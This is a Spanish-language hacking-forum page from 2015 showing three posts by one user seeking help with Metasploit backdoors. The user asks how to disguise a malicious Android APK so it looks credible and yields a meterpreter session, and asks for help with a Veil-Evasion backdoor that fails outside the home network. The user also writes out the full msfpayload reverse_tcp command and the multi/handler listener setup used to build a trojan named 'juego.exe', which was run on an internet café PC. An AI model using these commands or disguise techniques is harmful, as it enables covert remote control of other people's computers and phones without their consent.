elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Análisis y Diseño de Malware / Como camuflaro cambiar icono de una apk generada con metasploit en: 18 Septiembre 2015, 16:23 pm
Hola mi pregunta y que no e encontrado nada parecido para hacerlo , es, bueno me explico:
Tengo creada una apk maliciosa con msfpayload de metasploit pero no es nada creible por el nombre
MainActyvity y por el logo ya que sale el de metasploit alguien sabria como camuflarla en otra aplicacion de android o por lo menos cambiarle el icono y demas lo e intentado descompilandola con apkmanager
y bueno hay una pagina que dice que se puede poner el codigo del payload en otra aplicacion
pero los codigos que salen en dicha pagina no son los mismos de mi apk,
Hber si alguien que me explique como hacer mas creible mi apk maliciosa o como camuflarla con otra apli y que me de meterpreter por que seamos sinceros si no modificamos nada no es nada creible

Les agradeceria un monton a alguien que me diga como hacer esta tarea por que no soy capazla apk la he creado con kali linux 1.1.0
2  Seguridad Informática / Análisis y Diseño de Malware / Ayuda mi backdoor no me funciona en: 18 Mayo 2015, 00:26 am
Hola haber si me podeis echar una mano resulta que cree un backdoor con veil-evasion con kali y para dentro de mi red funciona sin problemas pero lo intente para fuera de mi red abri el puerto 4444 en mi router hacia mi direccion ip interna use el multi handler con el payload de windows/meterpreter reverse/tcp hacia mi ip interna y cuando la victima abrio el backdoor me pone:
send to stage y su ip pero no me inicia el meterpreter como puede ser ya me paso dos veces sale el stage to pero no llega a iniciar meterpreter que hago mal??? en el backdoor lo cree con mi ip externa
pues eso que no me inicia un meterpreter ejjeje puede ser culpa de veil es que con un backdoor normal de msfpayload si me yego a dar un meterpreter fuera de mi red aver si me echais una mano gracias!!!
3  Seguridad Informática / Hacking / intentando infectar pc con meterpreter ayuda.... en: 28 Marzo 2015, 22:22 pm
Hola pues estoy con kali linux y cree un backdoor con meterpreter para instalarselo a un pc de un ciber para practicar lo cree asin:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.. LPORT=4444 x > /root/Desktop/juego.exe
Este backdoor se lo instale en un pc con windows xp service pack3 con el firewall desactivado
y dejé dicho puerto a la escucha con:
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168...
set LPORT 4444
exploit -j

luego en el pc victima (el del ciber) hice un netstat -a para ver las conexiones y sale SYN_SENT
en mi conexion ayuda a ver que esta fallando. deje el de mi casa escuchando me fui al ciber con el pendrive y lo ejecute pero no establece conexion, cualquier ayuda lo agradeceria mucho saludos hackers.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines